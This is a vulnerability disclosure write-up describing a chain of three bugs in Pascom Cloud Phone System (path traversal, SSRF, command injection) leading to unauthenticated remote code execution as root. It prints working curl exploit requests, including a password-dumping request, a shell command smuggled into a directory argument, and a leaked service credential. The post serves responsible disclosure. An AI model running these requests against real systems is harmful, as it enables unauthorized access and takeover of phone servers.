The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems

Introduction

Pascom Cloud Phone System (CPS) provides integrated communication solutions for businesses and individuals. You can read more about it here

Pascom CPS System Structure

Before we get into the vulnerabilities we should look at how the pascom CPS is structured. The system runs a Linux-based OS but the products are deployed interestingly. Instead of running the services in the same environment (OS), CPS has multiple LXC containers providing a variety of services.

Path traveseral in Nginx to Tomcat reverse proxy requests (CVE-2021–45968)

The web UI exposes a java endpoint using Nginx reverse proxy. Using a known path traversal issue (see Here) caused by URI parsing inconsistencies between Nginx and Tomcat we can access non-exposed endpoints. This is more interesting coupled with the next bug.

# From /etc/nginx/nginx.conf in `pascom-<hostname>` container
# Xmppserver proxy /services/pluginscript -> localhost:9090
location ^~ /services/pluginscript {
rewrite ^/services/pluginscript/(.*) /$1 break;
proxy_pass http://127.0.0.1:9090/plugins/mobydick/pluginscript/$1$is_args$query_string;
}

Outdated Openfire (XMPP server) jar causes SSRF (CVE-2021–45967)

In the CPS there’s an instance of XMPP server by Ignite Realtime. This endpoint can be accessed from the web interface but only a few servlets are exposed. But using the path traversal bug we found, We can access any endpoint.

  • Use the password to exploit the last bug (RCE)
# Dump the password
curl -k --path-as-is 'https://192.168.56.105/pascom-confirm/services/pluginscript/..;/..;/..;/getFavicon?host=localhost/services/sysinfo/activeconfig?' -o - 2>/dev/null| jq | grep moby
# Use the password to dump some stuff (Make sure we got the right one)
curl -vk -o - --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/sysinfo/activeconfig" -o - 2>/dev/null | grep password

Command Injection in the scheduled task (CVE-2021–45966)

One of the features used in CPS is the ability to schedule and execute tasks using a daemon named exd. pl which runs as root. This daemon and the REST service are synchronized using an SQLite database stored in /var/lib/pascom/exd.db in the container named using the hostname. When a user requests a task to be executed it’s added to the database. Within a few seconds, exd.pl reads the request from the database and executed the task.

class tsk050380 extends ex_task{    public function perform( $pars ){
if (count($pars) < 2 || count($pars) > 4) {
$this->logError('Wrong parameters');
return false;
}
// Parameter prüfen
$tarfile = $pars[0];
$targetdir=$pars[1];
if(count($pars) > 2)
$deleteOutDir = $pars[2];
else
$deleteOutDir = false;
if (count($pars) > 3)
$createOutDir = $pars[3];
else
$createOutDir = false;
if ($createOutDir && !is_dir($targetdir)) {
if (!mkdir($targetdir, 0777, true)) {
$this->logError("Failed to create output directory: $targetdir");
return false;
}
}
if (!is_dir($targetdir)) {
$this->logError("No such directory: $targetdir");
return false;
}
if (!is_file($tarfile)) {
$this->logError("No such file: $tarfile");
return false;
}
if($deleteOutDir) {
$this->logMessage('Clean output directory');
$ret = $this->execute('rm -rf ' . realpath($targetdir) . '/*'); // RCE, $targetDir is derived from user input and not cleaned.
if($ret !== 0) {
# RCE request
curl -k -o - --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/apply" -H 'Content-Type: application/json' -d '{"task":"050380","executor":"tsk", "args": ["/etc/passwd", "/tmp/MAD_DIR$(id>PWNED)","True","True"] }' 2>/dev/null | jq

RCE Demo

A demo of the chain, With Local Privilege Escalation to root

Timeline

  • Dec 29, 2021, → Initial contact with Pascom
  • Jan 3, 2022, → Sent vulnerability details
  • Jan 5, 2022, → Pascom prepare patches, and a grace peroid to disclosure is set
  • Mar 7, 2022 → Public disclosure.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store